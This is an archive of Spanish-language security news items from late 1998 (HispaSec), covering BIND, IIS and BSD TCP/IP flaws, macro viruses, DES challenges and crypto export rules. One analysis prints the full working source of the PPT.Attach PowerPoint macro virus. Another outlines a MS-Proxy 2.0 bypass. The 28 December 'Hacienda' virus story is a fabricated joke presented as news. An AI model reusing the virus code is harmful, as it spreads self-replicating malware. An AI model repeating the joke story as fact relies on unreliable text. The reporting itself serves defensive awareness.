jueves, 31 de diciembre de 1998

Adios 1998, Feliz 1999

Se acaba el 1998, y damos la bienvenida a un nuevo año. Un 1998, que ha significado el nacimiento de HispaSec y que ha estado lleno de noticias. Vamos a aprovechar este último día del año para realizar un breve repaso a las noticias publicadas más destacadas.
La andadura de una-al-día nació un 28 de octubre y fue exactamente dos meses después, el 28 de diciembre cuando se abría al público nuestro web (www.hispasec.com). Nuestra primera noticia hacía referencia al Service Pack 4 y todos los problemas que se habían encontrado en él.

El tema vírico junto con el de Internet ha sido las materias que más artículos han generado en nuestro servicio de noticias. Hemos cubierto el nacimiento de nuevas tecnologías víricas, como los virus de script, los troyanos de Internet, con un estudio especial sobre el DeepThroat, los virus html o el primer virus para PowerPoint. También hemos dedicado un espacio a virus españoles como el Win32.Parvo o el Ithaqua.

Internet y las vulnerabilidades encontradas en determinados sistemas ha generado importantes noticias. Los fallos descubiertos por el español Juan Carlos García Cuartango han sido noticia en múltiples ocasiones, otros sistemas vulnerables de los que nos hemos hecho noticia han sido el SHH, BIND, routers cisco, el KDE, MS-Proxy, etc.

Pero también hemos informado de hechos importantes y relevantes en el mundo de la seguridad informática. La propuesta del PGP como estándar, el tratado de Wassenar, la problemática de Internet en China, o la reducción de las medidas en la limitación de exportación de material criptográfico por el gobierno estadounidense.

El 2000 y toda la problemática asociada también ha venido a ocupar una parte importante de este servicio de noticias. Sin duda el próximo año 1999, el problemático año dará mucho más que hablar.

Para acabar sólo nos queda desear un feliz año nuevo a todos nuestros suscriptores.


Antonio Ropero



miércoles, 30 de diciembre de 1998

Estados Unidos relaja las restricciones criptográficas

La administración estadounidense parece que por fin ha escuchado la voz de todos los usuarios y defensores de la criptografía y ha impuesto unas leyes más benignas para la exportación de tecnología criptográfica.
Las nuevas reglas del departamento de comercio permiten que las compañías estadounidenses vendan herramientas que utilicen el DES (o equivalentes) de 56 bits en el extranjero. Las reglas también eliminan restricciones en la venta de productos criptográficos a las subsidiarias de los E.E.U.U. en el extranjero.

Pero los críticos aun se quejan de que las nuevas restricciones tras la relajación aun son demasiado fuertes, dejando datos sensibles vulnerables a hackers dedicados con los suficientes recursos financieros. Muchos consideran esta acción como un buen primer paso de progresión, pero solamente eso.

Gracias a estas nuevas normas las firmas comerciales americanas esperan poder competir con mayor eficacia dentro del mercado criptográfico mundial, lo cual resultaba difícil debido a las severas restricciones que existían anteriormente. Por otra parte los usuarios de todo el mundo, podremos disfrutar sin problemas de tecnologías y programas a los cuales no teníamos acceso anteriormente.

El gobierno americano sigue imponiendo límites a la exportación pues teme que las autoridades, incluso con el permiso de un juez, no puedan leer los mensajes criminales o terroristas. Las anteriores normas de exportación de tecnología criptográfica fijaban el límite en 40 bits.

Los expertos sugieren que el correo delicado y las transacciones electrónicas usando criptografía de menos de 90 bits resultan vulnerables, mientras que se considera el cifrado de 128 bits como prácticamente seguro.

Sin duda la llegada de esta nueva medida es una buena noticia para todos los usuarios, aunque por nuestra parte también seguimos solicitando la ruptura total de cualquier limitación así como del tratado de Wassenaar.


Antonio Ropero



martes, 29 de diciembre de 1998

Vulnerabilidades en BIND

Bind el sistema de nombres equivalente al popular dns es vulnerable frente a paquetes tcp/ip construidos de forma malintencionada. A través de este problema un atacante puede llegar a conseguir acceso total a un ordenador afectado.
Cuando los ordenadores se comunican a través del protocolo TCP/IP utilizan una dirección numérica, la conocida IP. Sin embargo este método no es cómodo para las personas, es por ello que utilizamos nombres para referirnos a los ordenadores, www.hispasec.com en vez de 194.75.72.74

La asignación de los nombres de sistemas de Internet a sus direcciones IP correspondientes es una ardua tarea. Al principio se utilizaban ficheros en ASCII plano de manera local en los sistemas. Si bien, con la explosión de Internet y sus millones de ordenadores interconectados esta solución quedó impracticable. Para resolver este problema se diseñó un nuevo sistema, basado en una base de datos distribuida, conocido como BIND (Berkeley Internet Name Domain), el servidor de dominios de Internet Berkeley.

Las versiones BIND 4.9 anteriores a la BIND 4.9.7, y las BIND 8 anteriores a la 8.1.2, son vulnerables a peticiones formuladas con paquetes TCP, o mensajes DNS, formateados intencionadamente. Esto puede provocar accesos con nivel de root a través de desbordamientos de pila en el primer caso y denegaciones de servicio (DoS) utilizando los mensajes DNS formateados para la ocasión. Así mismo se ha detectado una tercera vulnerabilidad basada en autoreferencias en la cache del servidor de nombres que pueden acabar también en ataques DoS.

Todos estos problemas pueden ser corregidos actualizando los sistemas a la última versión de BIND de los correspondientes fabricantes del software. Así mismo, la Internet Software Consortium ha anunciado una nueva versión pública de BIND en http://www.isc.org/bind.html y en las news de USENET comp.protocols.dns. Para obtener información mas detallada de las vulnerabilidades, los sistemas afectados, y sus correspondientes parches, pueden dirigirse a http://www.ciac.org/ciac/bulletins/i-044a.shtml.

Nota: La noticia publicada en el día de ayer, fue la aportación humorística de HispaSec al 28 de diciembre, día de los Santos Inocentes. Por otra parte recordamos a todos nuestros lectores y suscriptores que la web de HispaSec se encuentra totalmente operativa en la dirección http://www.hispasec.com


Bernardo Quintero



lunes, 28 de diciembre de 1998

Hacienda infectada por un terrible virus

Todos los ordenadores de la Agencia Tributaria han sido infectados por un virus que se ha extendido rápidamente entre todas las delegaciones. El virus, del cual se desconocen aun gran parte de sus acciones parece que fue diseñado para colarse en esta red informática.
Desde esta mañana todos los terminales de las diferentes sucursales distribuidas por la geografía española de la Agencia Tributaria se han visto afectadas por un virus. La causa de la transmisión parece venir de la infección de uno de los múltiples parches de actualización del software a la nueva moneda europea, que durante los últimos meses se han visto obligados a instalar todos los administradores.

No se sabe aun mucho del virus, pero parece atender al nombre «Pay Now» y tiene una gran capacidad para extenderse a través de una red local haciendo difícil su control. Por otra parte, el virus toma control del propio software y tiene capacidad para modificar datos de forma totalmente coherente, lo que hace pensar que los programadores de este virus conocen muy a fondo el sistema informático de Hacienda. Los efectos en caso de que el virus siga adelante en su propagación y afectos pueden ser terribles para la Agencia Tributaria, ya que por regla general los datos son modificados a favor del contribuyente.

El virus está obligando a realizar un gran trabajo tanto a los administradores de red, para intentar erradicarlo, como a los propios funcionarios de la administración para intentar reponer gran parte de los datos afectados.


Antonio Ropero



domingo, 27 de diciembre de 1998

DoS en ciertas implementaciones de TCP/IP

Se ha detectado un nuevo agujero de seguridad, esta vez en algunas implementaciones de TCP/IP, más en concreto los sistemas con pilas TCP/IP de tipo BSD. Construyendo una secuencia de paquetes TCP/IP con unas características muy concretas, un intruso sin privilegios especiales puede causar comportamientos impredecibles del sistema atacado.
Los sistemas en los que se ha detectado este problema son el BSD/OS 3.1, las versiones anteriores a la FreeBSD 2.2.8 (la 2.2.8 no está afectada), y las primeras versiones 3.0 y la OpenBSD 2.3 y 2.4. Los parches de esta última están disponibles en su web (www.openbsd.org), los de BSD en http://www.bsdi.com/support/patches o en ftp://ftp.bsdi.com/bsdi/patches/patches-3.1 y los de FreeBSD en ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/CA-98-13/patch.

La conjunción de esta técnica con el conocido «spoofing» (simular una dirección IP que no es la del que la utiliza) hace imposible la detección y localización del atacante. Utilizando también el broadcasting, se puede atacar un gran número de sistemas con un número limitado de paquetes.

Las posibles soluciones a este problema pasan por instalar el parche correspondiente facilitado por el fabricante o por configurar los routers o firewalls para prevenir el enmascaramiento de direcciones, con lo que se dificulta la posibilidad de que los posibles atacantes utilicen el «spoofing».

Más información en http://www.cert.org/advisories/CA-98-13-tcp-denial-of-service.html


Santos Herranz



sábado, 26 de diciembre de 1998

RSA lanzará en 1999 el desafío DES III

El desafío a la comunidad criptográfica revelará la verdadera vulnerabilidad del DES, actualmente el estándar de encriptación del Gobierno Federal de los EE.UU. y, el más utilizado en todo el mundo.
El reto comenzará el 18 de Enero de 1999, a las 9:00 a.m. (PST), coincidiendo con los actos de inauguración de la expo-conferencia de la RSA Data Security que tendrá lugar en San Jose.

Como en ocasiones anteriores el desafío consiste en recuperar el texto original y la clave utilizada a través de un código cifrado mediante DES. Todo ello lo más rápidamente posible, intentando superar los tiempos conseguidos en los retos anteriores. Igualmente, será concedido un premio a quien consiga resolverlo primero, cuya cuantía dependerá del tiempo que haya transcurrido desde el comienzo del desafío.

Adoptado como estándar por el gobierno de los EE.UU. en 1977, el algoritmo DES 56-bits sigue siendo, hoy por hoy, el más utilizado por servicios financieros y otras industrias, sirviendo como base para proteger los datos sensibles. Si bien, es sabido que, con la tecnología actual este algoritmo no presenta la suficiente robustez para estos menesteres, aunque el último en percatarse parece ser el gobierno de los EE.UU.

El primer desafío (DES I) fue lanzado en enero de 1997 con la intención de demostrar la debilidad del algoritmo. El ganador en aquella ocasión fue el equipo de Rocke Verser de Loveland, Colorado, que recuperó la llave secreta en 96 días. En febrero de 1998, Distributed.net gano el desafío DES II-1, en tan solo 41 días, y aprovechando los recursos de miles de ordenadores a través de un sistema de informática distribuida en Internet. Por último, la EFF (Electronic Frontier Foundation) ganaría el DES II-2, cuando quebró el mensaje cifrado con DES en el tiempo récord de 56 horas. Para ello utilizaron un ordenador con hardware específico construido para la ocasión.


Bernardo Quintero



viernes, 25 de diciembre de 1998

Analizador del 2000 para Solaris

Sun Microsystems ofrece un programa gratuito para el control de sistemas, que establece el grado de compatibilidad de sus productos con el problema del año 2.000.
Bajo el nombre de Sunscan 2000 se ofrece una herramienta que posibilita verificar los componentes instalados de esta compañía y su comportamiento frente al cambio del milenio, El programa realiza un chequeo de posibles conflictos que pudieran surgir en el sistema en relación con el calendario y cálculos de tiempo.

Este programa esta diseñado para usuarios finales y administradores de sistemas y funciona en las versiones Solaris 2.3 o posteriores del sistema operativo Unix de Sun. Una vez que se ha escaneado el sistema, Sunscan 2000 presentará un análisis, en el que se identifica las necesidades de actualización de software.


Antonio Román



jueves, 24 de diciembre de 1998

Se pide una corte especial "año 2000" al Congreso de los EEUU

La Cámara de Comercio de los EEUU ha pedido al Congreso que habilite una
corte especial para dirimir todos los litigios relacionados con el año 2000,
ya que se prevé una riada de casos provocados por dicho problema.
Las previsiones sobre dicha corte no son muy esperanzadoras, ya que se
prevé que podría estar operativa al menos durante 5 años después del cambio
de siglo.
Las opiniones judiciales no se han hecho esperar, y estiman en billones de
dólares el coste de los litigios relacionados con el año 2000. Incluso hay
estimaciones más fatalistas que llegan hasta el trillón (americano) de
dólares. Se cree que a un año del cambio de fechas, no hay capacidad de reacción para poder poner en marcha una infraestructura legal que acoja esta petición.
Por otro lado, el esfuerzo estaría más que justificado: en puertas de 1999 hemos asistido a dos demandas por temas relacionados con la mala gestión de las fechas del milenio próximo. Estas demandas se han hecho públicas por los nombres de las empresas demandadas: ni más ni menos que Microsoft e IBM.

El origen de la demanda contra Microsoft fue la imposibilidad de trabajar con fechas que superaran el 2000 en algunas de las herramientas de desarrollo de la base de datos Fox Pro, en sus versiones 2.5, 2.6 y Visual Fox Pro 3.0. Este fallo ha sido reconocido por Microsoft, aunque no ha sido «parcheado» ya que, en palabras de Don Jones, responsable de productos Año 2000 (year 2000 product manager) de Microsoft, un parche que arreglara este problema «podría romper muchas otras cosas».
IBM, en compañía de Medic Computer System, han sido también demandadas por haber instalado en 1997 la versión 7 del software de Medic, una completa aplicación para la gestión de la consulta médica. Una clínica ginecológica localizada en Illinois pagó hace dos años unos 20.000 dólares por esta aplicación, encontrando ahora que no realiza correctamente el tránsito al nuevo milenio.


Santos Herranz



miércoles, 23 de diciembre de 1998

"Frame Spoof" y Cuartango

Microsoft ha reportado un parche que arregla nuevas vulnerabilidades en el Internet Explorer, entre ellas una variante descubierta por Juan Carlos García Cuartango. Las investigaciones de este Ingeniero de Telecomunicaciones español parecen no tener fin, ya es la tercera vez en apenas unos meses que pone en jaque a la multinacional de Bill Gates.
"Frame Spoof" es otra vulnerabilidad, a parte de la de Cuartango, que permite a un webmaster malintencionado crear una ventana falsa que imitase una ventana legítima en un sitio web. Dicha ventana podría recoger información confidencial de los navegantes y enviarla al sitio web malicioso. Microsoft recomienda encarecidamente que los usuarios de su navegador instalen el parche correspondiente.

Esta vulnerabilidad existe porque la cerca de protección del Internet Explorer no se ha extendido a la navegación en marcos (frames). Un usuario, que a simple vista no podría diferenciar el origen de una ventana, podría estar proporcionando información confidencial a través de ella al website dañino. Tanto el protocolo HTTP, como su versión segura HTTPS, son vulnerables a este nuevo agujero de seguridad.

Una explicación técnica y detallada de estas vulnerabilidades podrán ser consultadas en la web de HispaSec (http://www.hispasec.com) que se inagurará a finales de esta semana, contando con Juan Carlos García Cuartango, como firma habitual, además de otros expertos de reconocido prestigio en el campo de la seguridad informática y telecomunicaciones.

El parche, que también corrige las anteriores vulnerabilidades descubiertas por Cuartango, puede instalarse siguiendo las siguientes instrucciones:


Internet Explorer 3.X y 4.0

Los usuarios del IE 3.X y 4.0 deben actualizarse primero a la versión IE 4.01 con Service Pack 1, que está disponible en http://www.microsoft.com/windows/ie/download/. Después de instalar la versión revisada, deberá seguir el siguiente punto que explica el parche al IE 4.01.


Internet Explorer 4.01

Los usuarios de IE 4.01 (con o sin el Service Pack 1) puede obtener el parche del "Frame Spoof" en la dirección http://www.microsoft.com/windows/ie/security/spoof.asp. Los parches para Macintosh, HPUX y versiones de Solaris están, a día de hoy, en desarrollo.


Windows 98

Los usuarios de Windows 98 pueden obtener el parche escogiendo la Actualización automática desde del menú de Inicio, con lo que podrán acceder a éste y otros parches que su sistema necesite instalar.


Bernardo Quintero



martes, 22 de diciembre de 1998

Vulnerabilidad en el IIS

Microsoft ha publicado un parche para cubrir una nueva vulnerabilidad en Microsoft Internet Information Server (IIS), por la cual se pueden provocar ataque de Denegación de Servicio (DoS) contra servidores Web.
En esta ocasión Microsoft se adelanta a los posibles problemas, pues no se tiene constancia de usuarios afectados por esta vulnerabilidad. A pesar de ello la multinacional ha publicado un boletín y un parche para permitir que los usuarios eviten los potenciales riesgos de seguridad asociados. Microsoft recomienda que sean los propios usuarios los que evalúen su nivel de riesgo frente al ataque y decidan si deben instalar el parche o no.

Esta vulnerabilidad implica el método get del protocolo http, el cual es usado para obtener la información del servidor web. Determinadas peticiones get mal formadas pueden crear una situación de denegación de servicio por el consumo de todos los recursos del servidor, causando un «cuelgue» del ordenador. En algunos casos el servidor puede restaurarse parando y reiniciando el IIS, pero en otros es preciso rebotar el ordenador. Esta situación no ocurre de forma accidental, las peticiones get mal construidas deben formarse y enviarse al servidor de forma deliberada.

Microsoft deja claro en su aviso que el mayor daño que se puede causar es la denegación de servicio por la caída del servidor, en ningún caso esta vulnerabilidad permite que los datos del servidor queden comprometidos o que algún privilegio sea usurpado.

Parece que no se libra ninguna versión del problema, ya que afecta a
Microsoft Internet Information Server en sus versiones 3.0 y 4.0, sobre plataformas Intel y Alpha. Pero por otra parte el parche que ofrece el gigante del software no ha sido totalmente testeado y solamente se recomienda su aplicación en los sistemas que puedan sufrir un riesgo de ataque. Por ello, se recomienda que sean los propios usuarios los que evalúen el riesgo y decidan la instalación del parche. A pesar de todo de ello, Microsoft ofrece soporte sobre este parche.

El contrapunto viene dado por la afirmación de Microsoft de que la versión del parche completamente probada estará disponible como parte del próximo Service Pack para Windows NT. Resulta sorprendente que cuando apenas han transcurrido un par de meses de la ultima versión del Service Pack MS ya anuncie parches que sólo verán la luz en el SP5. Si este tarda en llegar tanto como el SP4, posiblemente ya no sea necesario pues todos los usuarios habrán instalado ya Windows 2000, (aunque por nuestra parte nos gustaría seguir llamándolo Windows NT 5).

Los parches se encuentran disponibles en las siguientes direcciones:
Para IIS 3.0 sobre plataformas X86:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/security/Infget-fix/infget3i.exe
Para IIS 4.0 sobre plataformas X86:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/security/Infget-fix/infget4i.exe
Para IIS 3.0 sobre plataformas Alpha:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/security/Infget-fix/infget3a.exe
Para IIS 4.0 sobre plataformas Alpha:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/security/Infget-fix/infget4a.exe



Antonio Ropero



lunes, 21 de diciembre de 1998

Nuevo Virus que ataca a través de redes locales

En los últimos días nuevos virus han visto la luz, Itaqua, Parvo o el primer virus para PowerPoint se han pasado por esta sección de noticias en pocos días. En esta ocasión un nuevo virus salta a la luz por haber tenido en jaque durante todo el fin de semana al gigante de las comunicaciones MCI WorldCom.
Network Associates (http://www.nai.com), el fabricante del antivirus McAfee, ha designado este ataque como un caso de «ciberterrorismo», pero MCI WorldCom (http://www.mciworldcom.com/) afirma que sus operaciones no se vieron afectadas. Aunque según comentarios internos a los que HispaSec ha tenido acceso «el sistema informático de MCI se ha derrumbado y ha afectado a varios lugares por culpa de un virus informático, lo que ha traído de cabeza durante el fin de semana a media empresa».

El portavoz de MCI ha rechazado informar acerca de la propagación del virus en su red, o de cuantos ordenadores se vieron afectados por «Remote Explorer», (Explorador Remoto) nombre asignado a este nuevo virus. El virus que parece que se propaga a si mismo sobre redes Windows NT, ha sido identificado hoy lunes por Network Associates que ha colaborado con MCI para contener el virus desde que éste fuera detectado el pasado jueves.

La misma Microsoft ha confirmado que también ha trabajado desde sábado con Network Associates para combatir el virus. Según la empresa de Bill Gates el virus se propaga sobre ordenadores con Windows NT bajo plataforma Intel pero solamente cuando funcionan en modo «administrador».

Remote Explorer comprime archivos de programa de tal forma que no pueden ejecutarse, y encripta ficheros de datos por lo que los usuarios no pueden tener acceso a ellos. Microsoft ha afirmado que la solución al problema recupera los datos perdidos y devuelve las máquinas a su configuración original.

El virus es residente en memoria e infecta ficheros exe, txt y html, tanto en NT Server como NT Workstation, propagándose rápidamente a través de entornos de red. La característica principal y más destacada de Remote Explorer es su capacidad para transmitirse y replicarse a si mismo a través de la red sin la intervención típica del usuario, lo cual le otorga cualidades propias de los «gusanos».

La detección del virus en un sistema resulta fácil de comprobar. Basta con acudir al «Panel de Control» de Windows NT y listar los «Servicios» que se están ejecutando, si se encuentra uno nombrado como «Remote Explorer» evidenciará la presencia del virus. Otra forma de detectar el virus es a través del «Administrador de tareas». Si entre los «procesos» listados se encuentran «ie403r.sys» o «taskmgr.sys» (no .exe) el sistema estará infectado.

Sorprendentemente se trata de un virus con un gran tamaño. Sus 125 Kbytes lo convierten en todo un gigante, especialmente comparándolo con los tamaños habituales de 10 Kbytes aproximadamente del otros virus. Este tamaño, puede venir dado al estar escrito en C, contando con unas 50.000 líneas de código y estimándose en 200 horas las labores de programación del virus.

El virus lleva una dll consigo para el proceso de infección, pero si la dll se borra el mismo creará otra copia. El virus incluye una rutina de tiempo, diseñada para aumentar su velocidad en el proceso de infección y búsqueda durante el periodo que comprende las 3:00 PM de cualquier sábado hasta las 6:00 AM del siguiente domingo. Otra característica sorprendente del virus es su ausencia de payload, o acción que lleva a cabo en su activación.

Si se localiza un sistema infectado en el entorno de red, es recomendable aislar dicho ordenador y determinar que maquinas están en conexión directa con ella, desactivando, de igual forma, la conexión a la red de estas otras. Como el virus infecta la memoria es necesario arrancar con un disquete limpio para proceder a su detección y limpieza. Network Assiciates dispone de un detector gratuito para Remote Explorer en sus páginas web, en la dirección http://www.nai.com/products/antivirus/remote_explorer.asp


Antonio Ropero



domingo, 20 de diciembre de 1998

Análisis del primer virus para PowerPoint

Apenas hace tres días, el 17 de diciembre, anunciábamos la aparición del primer virus de macro para PowerPoint. A día de hoy os presentamos el primer análisis desde HispaSec, en el cual podremos ver que se trata en realidad de un espécimen que no aporta nada nuevo a otros virus de macro similares.
El virus se presenta en un formulario dentro de una presentación (.PPT) para PowerPoint97. Para llegar a su código basta con dirigirse al menú Herramientas -> Macros -> Editor de VBA. En el formulario damos doble click y nos encontramos con el siguiente código. Los comentarios van en líneas separadas, y entre dobles corchetes [[ ]].

'
'PPT.Attach v0.1 /1nternal

[[Son dos comentarios (REM), el primero de ellos ' es utilizado como marca del virus para saber si un fichero se encuentra ya infectado.]]

Private Sub UserForm_Terminate()

[[El código se encuentra en el evento Terminate, es decir, se ejecutará cuando se cierre el formulario que lo contiene.]]

On Error Resume Next
Set Home = ActivePresentation
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = "C:\My Documents"
fs.SearchSubFolders = True
fs.FileName = "*.ppt"
fs.Execute

[[El virus se prepara para encontrar su primera víctima, Home es la aplicación actualmente infectada, a continuación realiza una búsqueda de ficheros de PowerPoint (mascara *.ppt) dentro del subdirectorio "C:\My Documents" incluidas subcarpertas.]]

For i = 1 To fs.FoundFiles.Count
If InStr(1, fs.FoundFiles(i), "~", 1) = 0 And fs.FoundFiles(i) <> Home.FullName Then
Set PVict = Presentations.Open(fs.FoundFiles(i))

[[Recorre todos los ficheros encontrados, descartando aquellos que tengan en su nombre el caracter "~" y a el fichero desde el cual se está ejecutando el virus (Home.Fullname). En el caso de encontrar un fichero que se ajuste a esas condiciones lo abre.]]

For j = 1 To PVict.VBProject.VBcomponents.Count
If PVict.VBProject.VBcomponents(j).Type = 3 Then
If PVict.VBProject.VBcomponents(j).Codemodule.Lines(1, 1) <> "'" Then

[[Recorre todos los componentes del fichero en busca de los formularios (tipo 3), y comprueba que no contiene la línea ', asegurándose así que no se encuentra ya previamente infectado.]]

PVict.VBProject.VBcomponents(j).Codemodule.InsertLines 1, Home.VBProject.VBcomponents(Name).Codemodule.Lines(1, 27)
PVict.Save
End If
End If
Next
PVict.Close
End If
Next

[[En el caso de que no esté infectado inserta en el formulario víctima las 27 líneas de las que se compone el virus y lo graba. Posteriormente lo cierra, y continua el bucle con el resto de ficheros que había encontrado.]]

Set PVict = Nothing
End Sub

Se trata de un virus muy simple y primitivo, similar al resto de virus de macro para los otros componentes de Office97 basados en Visual Basic para Aplicaciones. El virus original no afecta en principio a los usuarios españoles, aunque para que ello ocurra simplemente se debería cambiar la carpeta de búsqueda por las de C:\Mis Documentos. A la hora de actuar el virus es detectado fácilmente por abrir todos los documentos de PowerPoint que va encontrando, con el consiguiente aviso en la barra superior. Así como cuando infecta, se puede observar en la barra de estado como guarda el fichero. En el caso de que una presentación tuviera más de un formulario, el virus iría insertando su código en todos.

Un bug que hemos podido detectar, entre otras muchas posibles mejoras, es que el virus no comprueba si existe en el formulario a infectar un evento Terminate con antelación. Cuando esto ocurre el virus inserta su código, y producte un error al intentar compilar el formulario por la duplicidad del evento.


Bernardo Quintero



sábado, 19 de diciembre de 1998

Vulnerabilidad en MS-Proxy 2.0

Los sistemas con MS-Proxy 2.0 son vulnerables a un ataque desde Internet. Pueden ser víctimas aquellos sistemas que no tienen habilitado el filtro de paquetes, o bien, los que teniéndolo utilizan la misma máquina como servidor web.
Cuando MS-Proxy es instalado en un sistema con dos tarjetas de red, el administrador especifica la dirección pública en Internet y por otro lado la dirección IP del ordenador dentro de la red local. Esta información es almacenada en el archivo LAT (Local Address Table). De esta forma el proxy conoce que tarjeta está dentro de la red local y cual es la que va a utilizarse en la comunicación con Internet.
Una vez instalado, MS-Proxy deshabilita las conexiones web, cerrando el puerto TCP 80 en la interfaz dedicada a Internet. En realidad, el puerto 80 no se encuentra inactivo al 100%, es posible crear una conexión virtual TCP, aunque no tiene mucha utilidad ya que no retorna ninguna información. Mientras tanto, la tarjeta utilizada dentro de la red acepta las conexiones y servicios requeridos a través del puerto 80. De esta manera, solo los usuarios que se encuentren en la red local tienen acceso a los servicios del proxy.
Hasta aquí todo correcto, si no fuera por el hecho de que, en realidad, es posible hacer una conexión al puerto 80 de la interfaz local desde Internet. Para lograr hacer esto debemos de tener la misma mascara de subred que la de la interfaz dedicado a Internet por el servidor que tenga el proxy, y utilizar su dirección IP como gateway predeterminado en nuestro sistema. Una vez tengamos configurada nuestra máquina, procederemos a realizar un telnet al puerto 80 del servidor proxy y darle la siguiente orden:

GET http://[IP.Local]:[puerto]/HTTP/1.0
Donde [IP.Local] corresponde a la dirección IP que utiliza el servidor proxy en la red local, y pidiendo conectarnos a través de puerto indicado en [puerto].
En este momento se produce una conexión TCP al sistema protegido a través del puerto indicado. Aunque a priori pueda parecer un importante bug, se trata en realidad de una característica del algoritmo de enrutado IP. Cuando un sistema con varias interfaz de red, no configurado como router, recibe una petición a través de un paquete TCP, el sistema chequea todas sus direcciones IP locales para poder resolver dicha petición, aunque ésta venga desde una interfaz diferente.
Para solucionar esta vulnerabilidad en nuestros sistemas deberemos proceder a habilitar el control de acceso para todos los clientes en MS-Proxy, con lo que ya será necesario suministrar nombre de usuario y contraseña antes de poder realizar una conexión a través del proxy. Otras soluciones pasa por filtrar los paquetes del interfaz expuesto a Internet, de manera que no dejemos pasar ningún paquete de entrada a través del puerto 80.


Bernardo Quintero



viernes, 18 de diciembre de 1998

Búsqueda de nuevos estándares criptográficos

La firma Certicom (http://www.certicom.com/) ha creado el SECG, un grupo para diseñar un nuevo estándar criptográfico para que las diferentes especificaciones de la criptografía basada en curvas elípticas puedan interoperar.
Dos organismos de estandarización como el IEEE y ANSI están considerando la adopción de estándares que incluyen curvas elípticas pero sus esfuerzos no parecen suficientes. Se espera que la nueva organización defina un estándar más preciso.

Entre las firmas de seguridad en el grupo, se encuentran importantes autoridades del certificado, como las tecnologías Xcert, Ernst & Young, Fujitsu, GTE CyberTrust, y Thawte de Baltimore. Por el contrario VeriSign que fue parte de RSA, no es un miembro.

La RSA cuyos algoritmos extensamente utilizados compiten con Certicom, no ha sido invitada a unirse al grupo. Aunque la propia RSA anunció a principios de año que sus programas y herramientas soportarían curvas elípticas. A pesar de ello, el portavoz de Certicom anunció que la RSA era libre de unirse al grupo cuando lo deseara. Ningún portavoz de la RSA ha realizado declaraciones al respecto.

Según dijo Gadiel Seroussi, investigador de los laboratorios de Hewlett Packard y uno de los tres representantes de HP para el nuevo cuerpo: «la única manera de que se utilice la criptografía es si ésta puede interoperar con otros sistemas», Diversas formas participantes en el "Standards for Efficient Cryptography Group" (Grupo de estándares para criptografía eficiente) han licenciado la tecnología Certicom. Como la unidad VeriFone de HP que ha licenciado la tecnología para ATMs domésticas, 3Com para su PalmPilot y Motorola para telefonía inalámbrica.

Paul Kocher, presidente de la consultora criptográfica «Cryptography Research» (http://www.cryptography.com/), afirmó que Certicom es la única firma que puede dirigir la creación de un estándar, puesto que en el promotor más comercial de criptografía basada en curvas elípticas.

La firma tiene pensado presentar sus primeros documentos en una conferencia que se celebrará en febrero del próximo año.


Antonio Ropero



jueves, 17 de diciembre de 1998

MacroVirus para PowerPoint

Si Word, el procesador de textos de Microsoft, fue la primera víctima de los virus de macro, ahora le ha tocado el turno a PowerPoint. Se completa así una colección de técnicas víricas que tienen en el paquete Office su plataforma de infección.
En agosto de 1995 se produjo en el mundo de los virus informáticos una revolución. Había nacido el primer virus de macro, Concept, que utilizaba los documentos de Word para sus infecciones. Casi dos años después, en febrero de 1997, haría su aparición Laroux, el primero para Excel, la hoja de cálculo de Microsoft. En marzo de este año le tocaría el turno a Access, con el nacimiento del virus AccessiV, que atacaba los macros y módulos de las bases de datos.

Hace unos días, el 10 de diciembre, se completaba este círculo alrededor del paquete Office de Microsoft, con la aparición de Attach, un virus que usa Visual Basic para Aplicaciones y formularios de usuario para infectar los ficheros de PowerPoint.

No se considera una amenaza seria, en cuanto a propagación por infección, mientras que solamente afecte a los ficheros que contienen formularios en PowerPoint 97. Sin embargo, como los ficheros de PowerPoint son intercambiados con frecuencia, no se debe pasar por alto el daño que pueda causar a la comunidad de usuarios de este programa.

A día de hoy, ninguna casa antivirus ha suministrado la vacuna para esta nueva generación de virus de macro. En HispaSec, nos hemos hecho con un fichero infectado con Attach, con lo que en breve podremos presentar desde aquí un análisis detallado del mismo, a fin de poder descubrir el funcionamiento y evaluar el verdadero alcance de este nuevo virus.


Bernardo Quintero



miércoles, 16 de diciembre de 1998

Intel fabricará chips para la seguridad

Intel añadira nuevas funciones de seguridad y software a sus futuros conjuntos de chips en un movimiento que significa un estimulo para las características de los próximos procesadores Katmai.
Pero los planes de Intel están levantando preocupaciones entre las compañías de software, semiconductores y sistemas que temen que el gigante de los procesadores podría usurpar parte de sus mercados.

Uno de los planes de Intel pasa por integrar una memoria flash, con las funciones llave de la BIOS, que formará parte fundamental de sus conjuntos de chips Camino, Carmel y Whitney. Se espera que estos productos acompañarán los procesadores Katmai del año próximo y también sean utilizados en la línea Merced. El nuevo chip está diseñado para añadir nuevas características al proceso de arranque, no para reemplazar la BIOS estándar.

Parece ser que Intel no tiene intención de efectuar ninguna observación respecto a sus productos sin anunciar. Sin embargo, las características principales de los chips están comenzando a ver la luz basándose en informes de múltiples fuentes.

El nuevo proyecto de Intel es la creación de un chip flash cerrado en las capacidades de lectura y escritura, pero pueda ser abierto usando un protocolo criptográfico.

Las funciones de seguridad hardware incluyen una ingeniería criptográficapara autentificar certificados digitales Intel o de terceros que se carguen dentro. El chip podría mantener certificados múltiples, cada uno con el permiso de conceder características específicas, por ejemplo para permitir que un sistema operativo o un reproductor MPEG se ejecuten. Con esto también se podría evitar la piratería de software, pues permitiría asegurar que un programa licenciado a una persona no sea ejecutado en otra máquina. Además, los certificados actuarán como los números de serie únicos, identificando una máquina dada en cualquier transacción de la red Internet o corporativa.

El nuevo proyecto de Intel también permite incluir un generador de números aleatorios para crear las claves públicas para cifrado y para ayudar a permitir transmisiones cifradas entre ordenadores. Esto proporcionaría la seguridad para las transferencias directas en el comercio electrónico y downloads de software.

Otras fuentes han mencionado la seguridad física, conectando sensores al chip este puede reportar problemas a un administrador central si se trata de forzar o se quitan los periféricos. Aunque el chip no entrará en producción, al menos, hasta mediados del año que viene, en breve habrá muetras disponibles en Taiwan.


Antonio Ropero



martes, 15 de diciembre de 1998

IBM liberaliza su servidor de correo

IBM revoluciona el mundo de los servidores de correo, hace pocos días Sendmail anunciaba la decisión de publicar una versión comercial mejorada de su ya conocido servidor de correo. En esta ocasión IBM toma la posición contraria liberalizando su servidor Secure Mailer.
